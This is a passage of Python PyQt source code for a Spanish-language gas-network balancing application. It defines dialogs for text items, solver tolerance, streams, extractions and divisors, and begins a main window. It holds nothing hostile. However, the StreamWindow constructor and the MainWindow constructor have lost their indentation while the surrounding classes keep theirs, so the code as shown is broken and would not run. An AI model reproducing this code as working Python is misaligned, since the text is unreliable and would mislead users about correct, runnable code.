        self.item = item          # existing item to edit, or None to create one
        self.position = position  # where a newly created item is placed
        self.scene = scene
        self.editor = QTextEdit()
        self.editor.setAcceptRichText(False)
        self.editor.setTabChangesFocus(True)
        editorLabel = QLabel("&Text: ")
        editorLabel.setBuddy(self.editor)
        self.fontComboBox = QFontComboBox()
        self.fontComboBox.setCurrentFont(QFont("Times", PointSize))
        fontLabel = QLabel("&Font:")
        fontLabel.setBuddy(self.fontComboBox)
        self.fontSpinBox = QSpinBox()
        self.fontSpinBox.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
        self.fontSpinBox.setRange(6, 280)
        self.fontSpinBox.setValue(PointSize)
        fontSizeLabel = QLabel("&Size:")
        fontSizeLabel.setBuddy(self.fontSpinBox)
        self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
        # OK stays disabled until the editor holds non-empty text (see updateUi).
        self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
        if self.item is not None:
            # Editing an existing item: preload its text and font.
            self.editor.setPlainText(self.item.toPlainText())
            self.fontComboBox.setCurrentFont(self.item.font())
            self.fontSpinBox.setValue(self.item.font().pointSize())
        layout = QGridLayout()
        layout.addWidget(editorLabel, 0, 0)
        layout.addWidget(self.editor, 1, 0, 1, 6)
        layout.addWidget(fontLabel, 2, 0)
        layout.addWidget(self.fontComboBox, 2, 1, 1, 2)
        layout.addWidget(fontSizeLabel, 2, 3)
        layout.addWidget(self.fontSpinBox, 2, 4, 1, 2)
        layout.addWidget(self.buttonBox, 3, 0, 1, 6)
        self.setLayout(layout)
        '''Slots'''
        self.fontComboBox.currentFontChanged.connect(self.updateUi)
        self.fontSpinBox.valueChanged.connect(self.updateUi)
        self.editor.textChanged.connect(self.updateUi)
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)
        self.setWindowTitle("Cuadro de Texto - %s" % ("Add" if self.item is None else "Edit"))
        self.updateUi()

    '''Funciones de Text Dialog'''
    def updateUi(self):
        """Apply the selected font to the editor and gate the OK button on non-empty text."""
        font = self.fontComboBox.currentFont()
        font.setPointSize(self.fontSpinBox.value())
        self.editor.document().setDefaultFont(font)
        self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(not self.editor.toPlainText() == "")

    def accept(self):
        """Create the item on first accept, then push the edited text/font onto it."""
        if self.item is None:
            self.item = TextItem("", self.position, self.scene)
        font = self.fontComboBox.currentFont()
        font.setPointSize(self.fontSpinBox.value())
        self.item.setFont(font)
        self.item.setPlainText(self.editor.toPlainText())
        self.item.update()
        QDialog.accept(self)
class settingsWindow(QDialog):
    """Dialog to set the solver tolerance and maximum iteration count, with validation on accept."""

    def __init__(self, parent=None):
        super(settingsWindow, self).__init__(parent)
        # Placeholder-style initial text (Spanish UI strings kept as-is).
        self.Tolerancia = QLineEdit("Asigne tolerancia")
        self.Iteraciones = QLineEdit("Asigne número máximo de iteraciones")
        tol_Label = QLabel("Tolerancia:")
        it_Label = QLabel("Máximo número de iteraciones:")
        okButton = QPushButton("OK")
        cancelButton = QPushButton("Cancel")
        buttonLayout = QHBoxLayout()
        buttonLayout.addStretch()
        buttonLayout.addWidget(okButton)
        buttonLayout.addWidget(cancelButton)
        layout = QGridLayout()
        layout.addWidget(it_Label, 0, 0)
        layout.addWidget(self.Iteraciones, 0, 1)
        layout.addWidget(tol_Label, 1, 0)
        layout.addWidget(self.Tolerancia, 1, 1)
        layout.addLayout(buttonLayout, 2, 0, 1, 3)
        self.setLayout(layout)
        self.setMinimumSize(500, 50)
        self.setWindowTitle("Parámetros de cálculo")
        '''Slots'''
        okButton.clicked.connect(self.accept)
        cancelButton.clicked.connect(self.reject)

    def accept(self):
        """Close the dialog only when both fields parse as positive numbers; warn otherwise."""
        try:
            # NOTE(review): bare except below also swallows non-ValueError
            # failures; a targeted `except ValueError` would be safer.
            int(self.Iteraciones.text())
            if int(self.Iteraciones.text()) < 0:
                QMessageBox.warning(self, "Error", "Las número máximo de iteraciones no puede ser menor que cero")
                return
            if int(self.Iteraciones.text()) == 0:
                QMessageBox.warning(self, "Error", "Las número máximo de iteraciones no puede ser cero")
                return
        except:
            QMessageBox.warning(self, "Error", "Las número máximo de iteraciones tiene que ser un número")
            return
        try:
            a = float(self.Tolerancia.text())  # NOTE(review): `a` is unused
            if float(self.Tolerancia.text()) < 0:
                QMessageBox.warning(self, "Error", "La tolerancia no puede ser menor que cero")
                return
            if float(self.Tolerancia.text()) == 0:
                QMessageBox.warning(self, "Error", "La tolerancia no puede ser cero")
                return
        except:
            QMessageBox.warning(self, "Error", "La tolerancia tiene que ser un número")
            return
        QDialog.accept(self)
class StreamWindow(QDialog):
def __init__(self,parent=None):
super(StreamWindow,self).__init__(parent)
self.nombre=""
self.flujo=""
self.minimo=""
self.maximo=""
nombreLabel=QLabel("Nombre")
flujoLabel=QLabel("Flujo")
minLabel=QLabel("Mínimo")
maxLabel=QLabel("Máximo")
self.casilla=" "
if flag==False:
self.Nombre=QLineEdit("Asigne un nombre a la corriente")
self.Nombre.selectAll()
self.Flujo=QLineEdit("")
self.setWindowTitle("Nueva corriente")
self.minimo=QLineEdit("None")
self.minimo.setReadOnly(True)
self.maximo=QLineEdit("None")
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
self.critic_checkable=QCheckBox("Variable")
self.restriccion_checkable=QCheckBox("Restriccion")
self.fijar_checkable=QCheckBox("Fijar")
else:
item=form.scene.selectedItems()
item=item[0]
self.name=MainWindow.get_itemName(form,item)
self.Nombre=QLineEdit(self.name)
self.Nombre.selectAll()
self.Flujo=QLineEdit(str(streams[self.name].Flujo))
if streams[self.name].editable()!=True and streams[self.name].is_fixed()==False:
self.Flujo.setReadOnly(True)
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
limits=streams[self.name].get_limits()
self.minimo=QLineEdit(str(limits[0]))
self.maximo=QLineEdit(str(limits[1]))
self.critic_checkable=QCheckBox("Variable")
self.restriccion_checkable=QCheckBox("Restriccion")
self.fijar_checkable=QCheckBox("Fijar")
state=streams[self.name].is_critic()
self.setWindowTitle("Corriente")
if state=="variable" or state=="restriccion":
self.Flujo.setReadOnly(True)
self.Flujo.setStyleSheet("color:rgb(128,128,128);")
if state=="variable":
self.critic_checkable.setCheckState(2)
self.casilla="variable"
if state=="restriccion":
self.restriccion_checkable.setCheckState(2)
self.casilla="restriccion"
elif streams[self.name].is_fixed()==True:
self.fijar_checkable.setCheckState(2)
self.casilla="fijar"
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
else:
self.minimo.setReadOnly(True)
self.maximo.setReadOnly(True)
self.minimo.setStyleSheet("color:rgb(128,128,128);")
self.maximo.setStyleSheet("color:rgb(128,128,128);")
okButton=QPushButton("&OK")
cancelButton=QPushButton("Cancel")
buttonLayout=QHBoxLayout()
buttonLayout.addStretch()
buttonLayout.addWidget(okButton)
buttonLayout.addWidget(cancelButton)
layout=QGridLayout()
layout.addWidget(nombreLabel,0,0)
layout.addWidget(self.Nombre,0,1)
layout.addWidget(flujoLabel,1,0)
layout.addWidget(self.Flujo,1,1)
layout.addWidget(self.critic_checkable,2,0)
layout.addWidget(self.restriccion_checkable,2,1)
layout.addWidget(self.fijar_checkable,2,3)
layout.addWidget(minLabel,3,0)
layout.addWidget(self.minimo,3,1)
layout.addWidget(maxLabel,3,2)
layout.addWidget(self.maximo,3,3)
layout.addLayout(buttonLayout,4,0,1,3)
self.setLayout(layout)
self.setMinimumSize(300,50)
'''Slots'''
okButton.clicked.connect(self.accept)
cancelButton.clicked.connect(self.reject)
self.critic_checkable.toggled.connect(self.critic_stream)
self.restriccion_checkable.toggled.connect(self.critic_stream)
self.fijar_checkable.toggled.connect(self.critic_stream)
'''-------------------Funciones de StreamWindow--------------'''
    def critic_stream(self):
        # Slot connected to the toggled signal of the three check boxes
        # ("Variable", "Restriccion", "Fijar").  Keeps them mutually exclusive
        # and enables/disables the flow and limit fields to match the mode.
        #
        # NOTE(review): self.casilla records which box was active before this
        # toggle.  Calling setCheckState(0) below re-emits toggled, so this
        # slot re-enters itself once before the state tests run — the
        # statement order here is load-bearing; do not reorder.
        if self.casilla=="variable":
            self.critic_checkable.setCheckState(0)
        if self.casilla=="restriccion":
            self.restriccion_checkable.setCheckState(0)
        if self.casilla=="fijar":
            self.fijar_checkable.setCheckState(0)
        if self.critic_checkable.checkState()!=0:
            # "Variable" mode: flow becomes the unknown "x", limits editable.
            self.Flujo.setReadOnly(True)
            self.Flujo.setText("x")
            self.Flujo.setStyleSheet("color:rgb(128,128,128);")
            self.minimo.setReadOnly(False)
            self.maximo.setReadOnly(False)
            self.minimo.setStyleSheet("color:rgb(0,0,0);")
            self.maximo.setStyleSheet("color:rgb(0,0,0);")
            self.casilla="variable"
        elif self.restriccion_checkable.checkState()!=0:
            # "Restriccion" mode: same field layout as "variable".
            self.Flujo.setReadOnly(True)
            self.Flujo.setText("x")
            self.Flujo.setStyleSheet("color:rgb(128,128,128);")
            self.minimo.setReadOnly(False)
            self.maximo.setReadOnly(False)
            self.minimo.setStyleSheet("color:rgb(0,0,0);")
            self.maximo.setStyleSheet("color:rgb(0,0,0);")
            self.casilla="restriccion"
        elif self.fijar_checkable.checkState()!=0:
            # "Fijar" (fixed) mode: flow editable, limits disabled.
            self.Flujo.setReadOnly(False)
            self.Flujo.setStyleSheet("color:rgb(0,0,0);")
            self.minimo.setText("None")
            self.maximo.setText("None")
            self.minimo.setReadOnly(True)
            self.maximo.setReadOnly(True)
            self.minimo.setStyleSheet("color:rgb(128,128,128);")
            self.maximo.setStyleSheet("color:rgb(128,128,128);")
            self.casilla="fijar"
        else:
            # No box checked: plain stream — flow editable, limits disabled.
            self.Flujo.setReadOnly(False)
            self.Flujo.setStyleSheet("color:rgb(0,0,0);")
            self.minimo.setText("None")
            self.maximo.setText("None")
            self.minimo.setReadOnly(True)
            self.maximo.setReadOnly(True)
            self.minimo.setStyleSheet("color:rgb(128,128,128);")
            self.maximo.setStyleSheet("color:rgb(128,128,128);")
            self.casilla=""
    def accept(self):
        """Validate the stream dialog; close only when name, limits and flow pass.

        Uses module-level state: ``flag`` (False = creating a new stream,
        True = editing the selected one), ``streams`` and ``spliters``
        (global name registries).  On any validation failure a warning box is
        shown and the dialog stays open.
        """
        try:
            if self.Nombre.text()=="Asigne un nombre a la corriente" or self.Nombre.text()=="":
                # Unnamed stream: auto-assign the next numeric name.
                if len(streams)==0:
                    self.Nombre.setText("1")
                else:
                    n=len(streams)
                    n+=1
                    self.Nombre.setText(str(n))
            else:
                if flag==False:
                    # Creation mode: collapse whitespace runs in the name...
                    name=""
                    name_lis=self.Nombre.text().split()
                    for i in name_lis:
                        name+=i
                        name+=" "
                    self.Nombre.setText(name)
                    # ...then strip leading/trailing blanks.
                    while self.Nombre.text()[0]==" ":
                        self.Nombre.setText(self.Nombre.text()[1:])
                    while self.Nombre.text()[-1]==" ":
                        self.Nombre.setText(self.Nombre.text()[0:-1])
                    # Reject duplicates and reserved words.
                    if self.Nombre.text() in streams:
                        QMessageBox.warning(self, "Error de especificación","Ya existe una corriente con el nombre asignado, favor de asignar un nombre diferente")
                        return
                    if self.Nombre.text() in spliters:
                        # Name clashes with a spliter: prefix to disambiguate.
                        self.Nombre.setText("Corriente "+self.Nombre.text())
                    if "Divisor" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Divisor'")
                        return
                    if "Extracción" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Extracción'")
                        return
                elif flag==True:
                    # Edit mode: same whitespace normalisation...
                    name=""
                    name_lis=self.Nombre.text().split()
                    for i in name_lis:
                        name+=i
                        name+=" "
                    self.Nombre.setText(name)
                    while self.Nombre.text()[0]==" ":
                        self.Nombre.setText(self.Nombre.text()[1:])
                    while self.Nombre.text()[-1]==" ":
                        self.Nombre.setText(self.Nombre.text()[0:-1])
                    # ...but only validate when the name actually changed.
                    if self.name!=self.Nombre.text():
                        if self.Nombre.text() in streams:
                            QMessageBox.warning(self, "Error de especificación","Ya existe una corriente con el nombre asignado, favor de asignar un nombre diferente")
                            return
                        if self.Nombre.text() in spliters:
                            self.Nombre.setText("Corriente "+self.Nombre.text())
                        if "Divisor" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Divisor'")
                            return
                        if "Extracción" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de una corriente no puede llevar la palabra 'Extracción'")
                            return
            if self.critic_checkable.checkState()!=0 or self.restriccion_checkable.checkState()!=0:
                # Variable/restriction streams need numeric, ordered limits.
                minimo=self.minimo.text()
                maximo=self.maximo.text()
                minimo=float(minimo)
                maximo=float(maximo)
                if maximo < minimo:
                    QMessageBox.warning(self,"Error en limites","Los limites tienen que ser de la forma mínimo < máximo")
                    return
            flujo=self.Flujo.text()
            if flujo=="" or flujo=="x":
                # Unknown flow: stored empty; treated as the unknown "x".
                self.Flujo.setText("")
                QDialog.accept(self)
            else:
                flujo=float(flujo)  # validates the flow is numeric
                QDialog.accept(self)
        except:
            # NOTE(review): bare except — every failure above (ValueError from
            # float(), IndexError from an all-blank name, ...) is funnelled
            # into this single "flow" error message.
            QMessageBox.warning(self,"Error de flujo","Ningún flujo puede ser texto (Mínimo, máximo, flujo)")
            return
###----------------------------------------------------------------------------------###
'''----------------------------------------------------------------------------------'''
###----------------------------------------------------------------------------------###
class ExtractionWindow(QDialog):
    """Dialog for creating or editing an extraction stream.

    Relies on module-level state: ``flag`` (False = create a new extraction,
    True = edit the item currently selected in ``form.scene``), plus the
    global registries ``streams`` and ``spliters``.
    """
    def __init__(self,parent=None):
        # Build the name/flow form and wire the OK/Cancel buttons.
        super(ExtractionWindow,self).__init__(parent)
        nombreLabel=QLabel("Nombre")
        flujoLabel=QLabel("Flujo")
        if flag==False:
            # Creation mode: placeholder name, empty flow.
            self.Nombre=QLineEdit("Asigne un nombre a la extracción")
            self.Nombre.selectAll()
            self.Flujo=QLineEdit("")
            self.setWindowTitle("Nueva extracción")
        elif flag==True:
            # Edit mode: load the stream backing the selected scene item.
            item=form.scene.selectedItems()
            item=item[0]
            self.name=MainWindow.get_itemName(form,item)
            self.Nombre=QLineEdit(self.name)
            self.Nombre.selectAll()
            self.Flujo=QLineEdit(str(streams[self.name].Flujo))
            if streams[self.name].editable()!=True:
                # Solved flows must not be edited by hand.
                self.Flujo.setReadOnly(True)
            self.setWindowTitle("Extracción")
        okButton=QPushButton("&OK")
        cancelButton=QPushButton("Cancel")
        buttonLayout=QHBoxLayout()
        buttonLayout.addStretch()
        buttonLayout.addWidget(okButton)
        buttonLayout.addWidget(cancelButton)
        layout=QGridLayout()
        layout.addWidget(nombreLabel,0,0)
        layout.addWidget(self.Nombre,0,1)
        layout.addWidget(flujoLabel,1,0)
        layout.addWidget(self.Flujo,1,1)
        layout.addLayout(buttonLayout,2,0,1,3)
        self.setLayout(layout)
        self.setMinimumSize(300,50)
        '''Slots'''
        okButton.clicked.connect(self.accept)
        cancelButton.clicked.connect(self.reject)
        '''----------------------------------------------'''
    '''------------Funciones de 'ExtraccionWIndow'----------'''
    def accept(self):
        """Validate name and flow; close the dialog only when both pass."""
        try:
            flujo=self.Flujo.text()
            # Non-numeric flow raises ValueError and jumps to the handler.
            flujo=float(flujo)
            if self.Nombre.text()=="Asigne un nombre a la extracción" or self.Nombre.text()=="":
                # Unnamed: auto-assign the next numeric name.
                global streams
                if len(streams)==0:
                    self.Nombre.setText("1")
                else:
                    n=len(streams)
                    n+=1
                    self.Nombre.setText(str(n))
            else:
                # Collapse whitespace runs in the name...
                name=""
                name_lis=self.Nombre.text().split()
                for i in name_lis:
                    name+=i
                    name+=" "
                self.Nombre.setText(name)
                # ...then strip trailing/leading blanks.
                while self.Nombre.text()[-1]==" ":
                    self.Nombre.setText(self.Nombre.text()[0:-1])
                while self.Nombre.text()[0]==" ":
                    self.Nombre.setText(self.Nombre.text()[1:])
                if flag==False:
                    # Creation: reject duplicates and reserved words.
                    if self.Nombre.text() in streams:
                        QMessageBox.warning(self, "Error de especificación","Ya existe una extracción con el nombre asignado, favor de asignar un nombre diferente")
                        return
                    if self.Nombre.text() in spliters:
                        # Name clashes with a spliter: prefix to disambiguate.
                        self.Nombre.setText("Extracción "+self.Nombre.text())
                    if "Divisor" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Divisor'")
                        return
                    if "Corriente" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Corriente'")
                        return
                if flag==True:
                    # Editing: only validate when the name actually changed.
                    if self.name!=self.Nombre.text():
                        if self.Nombre.text() in streams:
                            QMessageBox.warning(self, "Error de especificación","Ya existe una extracción con el nombre asignado, favor de asignar un nombre diferente")
                            return
                        if self.Nombre.text() in spliters:
                            self.Nombre.setText("Extracción "+ self.Nombre.text())
                        if "Divisor" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Divisor'")
                            return
                        if "Corriente" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de una extracción no puede llevar la palabra 'Corriente'")
                            return
            QDialog.accept(self)
        except:
            # NOTE(review): bare except — any failure above is reported as a
            # flow problem; 'flujo' may even be unbound here if Flujo.text()
            # itself raised (would then raise NameError).  Confirm intent.
            if flujo=="" or flujo=="Favor de assignar un flujo":
                self.Flujo.setText("Favor de assignar un flujo")
                self.Flujo.selectAll()
                self.Flujo.setFocus()
                return
            else:
                self.Flujo.setText("El flujo debe de ser un numero")
                self.Flujo.selectAll()
                self.Flujo.setFocus()
                return
###---------------------------------------------------------------------------####
'''---------------------------------------------------------------------------'''
###---------------------------------------------------------------------------####
class DivisorWindow(QDialog):
    """Dialog for creating or editing a divisor (spliter) node.

    Shows two searchable check-lists (inlets / outlets) built from the global
    ``streams`` registry, plus two read-only lists echoing the current
    selection.  Uses module-level state: ``flag`` (False = create, True =
    edit the item selected in ``form.scene``) and the ``spliters`` registry.
    """
    def __init__(self,parent=None):
        super(DivisorWindow,self).__init__(parent)
        self.NombreLabel=QLabel("Nombre")
        self.EntradasLabel=QLabel("Entradas")
        self.SalidasLabel=QLabel("Salidas")
        self.Entradas_seleccionadas_Label=QLabel("Entradas seleccionadas")
        self.Salidas_seleccionadas_Label=QLabel("Salidas seleccionadas")
        self.Nombre=QLineEdit("Asigne nombre al divisor")
        self.textbox=QLineEdit("Buscar corriente")
        self.Entradas=[] # Selected inlet names, handed to the Spliter object
        self.Salidas=[] # Selected outlet names
        self.offset_inlets=0
        self.offset_outlets=0
        '''Seteo de checklist'''
        # Views and models backing the four lists (check-lists + echo lists).
        self.entradas_list=QListView()
        self.salidas_list=QListView()
        self.inlet_list=QListView()
        self.outlet_list=QListView()
        self.model_inlets=QStandardItemModel()
        self.model_outlets=QStandardItemModel()
        self.inside_streams=[] # Sorted stream names offered inside the dialog
        # Collect the available stream names.
        for i in streams:
            self.inside_streams.append(streams[i].name)
        self.inside_streams.sort()
        # Populate the models.
        '''Creación o modificación'''
        if flag==True:
            # Edit mode: pre-check the inlets/outlets of the selected spliter.
            item=form.scene.selectedItems()
            item=item[0]
            self.name=MainWindow.get_itemName(form,item)
            self.Nombre.setText(self.name)
            selected_inlets=spliters[self.name].entradas
            selected_outlets=spliters[self.name].salidas
            for i in self.inside_streams:
                item=QStandardItem(i)
                item.setCheckable(True)
                if i in selected_inlets:
                    # NOTE(review): 1 is Qt.PartiallyChecked; the rest of the
                    # dialog only tests checkState()!=0, so it acts as checked.
                    item.setCheckState(1)
                    self.Entradas.append(i)
                self.model_inlets.appendRow(item)
                item=QStandardItem(i)
                item.setCheckable(True)
                if i in selected_outlets:
                    item.setCheckState(1)
                    self.Salidas.append(i)
                self.model_outlets.appendRow(item)
            # Echo lists: disabled (read-only) copies of the selection.
            self.model_entradas=QStandardItemModel()
            self.model_salidas=QStandardItemModel()
            for i in self.Entradas:
                item=QStandardItem(i)
                item.setEnabled(False)
                self.model_entradas.appendRow(item)
            self.model_salidas=QStandardItemModel()
            for i in self.Salidas:
                item=QStandardItem(i)
                item.setEnabled(False)
                self.model_salidas.appendRow(item)
            self.salidas_list.setModel(self.model_salidas)
            self.entradas_list.setModel(self.model_entradas)
            self.inlet_list.setModel(self.model_inlets)
            self.outlet_list.setModel(self.model_outlets)
        else:
            # Creation mode: every stream starts unchecked.
            for i in self.inside_streams:
                item=QStandardItem(i)
                item.setCheckable(True)
                self.model_inlets.appendRow(item)
                item=QStandardItem(i)
                item.setCheckable(True)
                self.model_outlets.appendRow(item)
            self.inlet_list.setModel(self.model_inlets)
            self.outlet_list.setModel(self.model_outlets)
        ''' Botones "ok" y "cancel"'''
        okButton=QPushButton("&OK")
        cancelButton=QPushButton("Cancel")
        buttonLayout=QHBoxLayout()
        buttonLayout.addStretch()
        buttonLayout.addWidget(okButton)
        buttonLayout.addWidget(cancelButton)
        '''Seteo de grid y layout'''
        layout=QGridLayout()
        layout.addWidget(self.NombreLabel,0,0)
        layout.addWidget(self.Nombre,0,1)
        layout.addWidget(self.EntradasLabel,1,0)
        layout.addWidget(self.SalidasLabel,1,1)
        layout.addWidget(self.inlet_list,2,0)
        layout.addWidget(self.outlet_list,2,1)
        layout.addWidget(self.textbox,3,0,1,3)
        layout.addWidget(self.Entradas_seleccionadas_Label,4,0)
        layout.addWidget(self.Salidas_seleccionadas_Label,4,1)
        layout.addWidget(self.entradas_list,5,0)
        layout.addWidget(self.salidas_list,5,1)
        layout.addLayout(buttonLayout,6,0,1,3)
        self.setLayout(layout)
        self.setWindowTitle("Nuevo divisor")
        self.setMinimumSize(300,50)
        '''Slots'''
        okButton.clicked.connect(self.accept)
        cancelButton.clicked.connect(self.reject)
        self.textbox.textChanged.connect(self.refresh_list)
        self.model_inlets.itemChanged.connect(self.item_changed_inlets)
        self.model_outlets.itemChanged.connect(self.item_changed_outlets)
        self.textbox.selectAll()
        self.textbox.setFocus()
    '''------------------------------------------'''
    '''-----Funciones de 'DivisorWindow'---------'''
    '''--------------------------------------------'''
    def refresh_list(self):
        """Rebuild both check-lists, filtered by the search box text.

        Previously checked names (tracked in self.Entradas / self.Salidas)
        are re-checked after the rebuild.
        """
        self.model_outlets=QStandardItemModel()
        self.model_inlets=QStandardItemModel()
        # Fresh models need the itemChanged slots reconnected.
        self.model_inlets.itemChanged.connect(self.item_changed_inlets)
        self.model_outlets.itemChanged.connect(self.item_changed_outlets)
        if self.textbox.text()=="":
            # Empty filter: show every stream.
            for i in self.inside_streams:
                item=QStandardItem(i)
                item.setCheckable(True)
                if i in self.Entradas:
                    item.setCheckState(1)
                self.model_inlets.appendRow(item)
                item=QStandardItem(i)
                item.setCheckable(True)
                if i in self.Salidas:
                    item.setCheckState(1)
                self.model_outlets.appendRow(item)
            self.inlet_list.setModel(self.model_inlets)
            self.outlet_list.setModel(self.model_outlets)
        else:
            # Substring filter on the stream name.
            for stream in self.inside_streams:
                if self.textbox.text() in stream:
                    item=QStandardItem(stream)
                    item.setCheckable(True)
                    if stream in self.Entradas:
                        item.setCheckState(1)
                    self.model_inlets.appendRow(item)
                    item=QStandardItem(stream)
                    item.setCheckable(True)
                    if stream in self.Salidas:
                        item.setCheckState(1)
                    self.model_outlets.appendRow(item)
            self.inlet_list.setModel(self.model_inlets)
            self.outlet_list.setModel(self.model_outlets)
    def item_changed_inlets(self,item):
        """Sync self.Entradas with a toggled inlet item and refresh the echo list."""
        if item.checkState()!=0 and item.text() not in self.Entradas:
            self.Entradas.append(item.text())
        elif item.checkState()==0 and item.text() in self.Entradas:
            self.Entradas.remove(item.text())
        # Rebuild the read-only echo list from scratch.
        self.model_entradas=QStandardItemModel()
        for i in self.Entradas:
            item=QStandardItem(i)
            item.setEnabled(False)
            self.model_entradas.appendRow(item)
        self.entradas_list.setModel(self.model_entradas)
    def item_changed_outlets(self,item):
        """Sync self.Salidas with a toggled outlet item and refresh the echo list."""
        if item.checkState()!=0 and item.text() not in self.Salidas:
            self.Salidas.append(item.text())
        elif item.checkState()==0 and item.text() in self.Salidas:
            self.Salidas.remove(item.text())
        self.model_salidas=QStandardItemModel()
        for i in self.Salidas:
            item=QStandardItem(i)
            item.setEnabled(False)
            self.model_salidas.appendRow(item)
        self.salidas_list.setModel(self.model_salidas)
    def accept(self):
        """Validate the divisor before closing.

        Requires at least one inlet and one outlet, disjoint inlet/outlet
        sets, and a unique name without the reserved words.
        """
        if len(self.Entradas)==0 or len(self.Salidas)==0:
            QMessageBox.warning(self, "Error de especificación","Es necesario especificar por lo menos una corriente de entrada y una corriente de salida")
            return
        else:
            # A stream cannot be both inlet and outlet of the same divisor.
            for i in self.Entradas:
                if i in self.Salidas:
                    QMessageBox.warning(self, "Error de especificación","Una misma corriente no puede ser entrada y salida a la vez")
                    return
        if self.Nombre.text()=="Asigne nombre al divisor" or self.Nombre.text()=="":
            # Unnamed: auto-assign the next free "Divisor N".
            name_divisor=len(spliters)
            if name_divisor==0:
                name_divisor+=1
                self.Nombre.setText("Divisor "+str(name_divisor))
            else:
                name_divisor+=1
                while "Divisor "+str(name_divisor) in spliters:
                    name_divisor+=1
                self.Nombre.setText("Divisor "+str(name_divisor))
        else:
            if len(spliters)==0:
                QDialog.accept(self)
            else:
                if flag==False:
                    # Creation: normalise whitespace in the name...
                    name=""
                    name_lis=self.Nombre.text().split()
                    for i in name_lis:
                        name+=i
                        name+=" "
                    self.Nombre.setText(name)
                    while self.Nombre.text()[0]==" ":
                        self.Nombre.setText(self.Nombre.text()[1:])
                    while self.Nombre.text()[-1]==" ":
                        self.Nombre.setText(self.Nombre.text()[0:-1])
                    # ...then resolve clashes and reserved words.
                    if self.Nombre.text() in streams:
                        self.Nombre.setText("Divisor "+self.Nombre.text())
                        if self.Nombre.text() in spliters:
                            QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
                            return
                    if self.Nombre.text() in spliters:
                        QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
                        return
                    if "Corriente" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Corriente'")
                        return
                    if "Extracción" in self.Nombre.text():
                        QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Extracción'")
                        return
                elif flag==True:
                    # Edit mode: same normalisation, checks only on rename.
                    name=""
                    name_lis=self.Nombre.text().split()
                    for i in name_lis:
                        name+=i
                        name+=" "
                    self.Nombre.setText(name)
                    while self.Nombre.text()[0]==" ":
                        self.Nombre.setText(self.Nombre.text()[1:])
                    while self.Nombre.text()[-1]==" ":
                        self.Nombre.setText(self.Nombre.text()[0:-1])
                    if self.name!=self.Nombre.text():
                        if self.Nombre.text() in streams:
                            self.Nombre.setText("Divisor "+self.Nombre.text())
                        if self.Nombre.text() in spliters:
                            QMessageBox.warning(self, "Error de especificación","Ya existe un divisor con el nombre asignado. Favor de asignar un nombre diferente")
                            return
                        if "Corriente" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Corriente'")
                            return
                        if "Extracción" in self.Nombre.text():
                            QMessageBox.warning(self,"Error de nombre","El nombre de un divisor no puede contener la palabra 'Extracción'")
                            return
                    else:
                        # NOTE(review): on this path QDialog.accept runs here
                        # AND again below — a second accept on an accepted
                        # dialog; appears harmless but confirm intent.
                        QDialog.accept(self)
        QDialog.accept(self)
#########################################################################################################################
'''-------------------------------------------------------------------------------------------------------------------'''
#########################################################################################################################
class MainWindow(QMainWindow):
def __init__(self,parent=None):
#Main Window
super(MainWindow,self).__init__(parent)
self.filename=""
self.prevPoint=QPoint()
self.setWindowTitle("Balanceador del Sistrangas----")
self.addOffset=5
self.setWindowIcon(QIcon(":/LogoCenagas.png"))
self.prevPoint=QPoint()
self.tol=0.00001
self.max_it=50
'''---------------'''
'''Actions & Icons'''
#Icons para paleta de botones
#Stream Icon
self.AddStream=QPushButton("")
self.AddStream.setIcon(QIcon(":/stream_button.png"))
self.AddStream.setIconSize(QSize(80,20))
helpText="Create a new stream"
self.AddStream.setToolTip(helpText)
self.AddStream.setStatusTip(helpText)
self.AddStream.clicked.connect(self.addStreamFun)
#Extraccion Icon
self.AddExtraccion=QPushButton("")
self.AddExtraccion.setIcon(QIcon(":/extraction_button.png"))
self.AddExtraccion.setIconSize(QSize(80,20))
helpText="Create a new extraccion"
self.AddExtraccion.setToolTip(helpText)
self.AddExtraccion.setStatusTip(helpText)
self.AddExtraccion.clicked.connect(self.addExtractionFun)
#Divisor Icon
self.AddDivisor=QPushButton("")
self.AddDivisor.setIcon(QIcon(":/Divisor.png"))
self.AddDivisor.setIconSize(QSize(80,20))
helpText="Create a new divisor"
self.AddDivisor.setToolTip(helpText)
self.AddDivisor.setStatusTip(helpText)
self.AddDivisor.clicked.connect(self.addDivisorFun)
#Rotate Icon
self.RotateIcon=QPushButton("")
self.RotateIcon.setIcon(QIcon(":/rotate_button.png"))
self.RotateIcon.setIconSize(QSize(80,20))
helpText="Rotate Icon"
self.RotateIcon.setToolTip(helpText)
self.RotateIcon.setStatusTip(helpText)
self.RotateIcon.clicked.connect(self.rotate)
#Cenagas Icon
self.CenagasLogo=QLabel("")
pixmap=QPixmap(":/Cenagas.png")
pixmap_resized=pixmap.scaled(300,75.09)
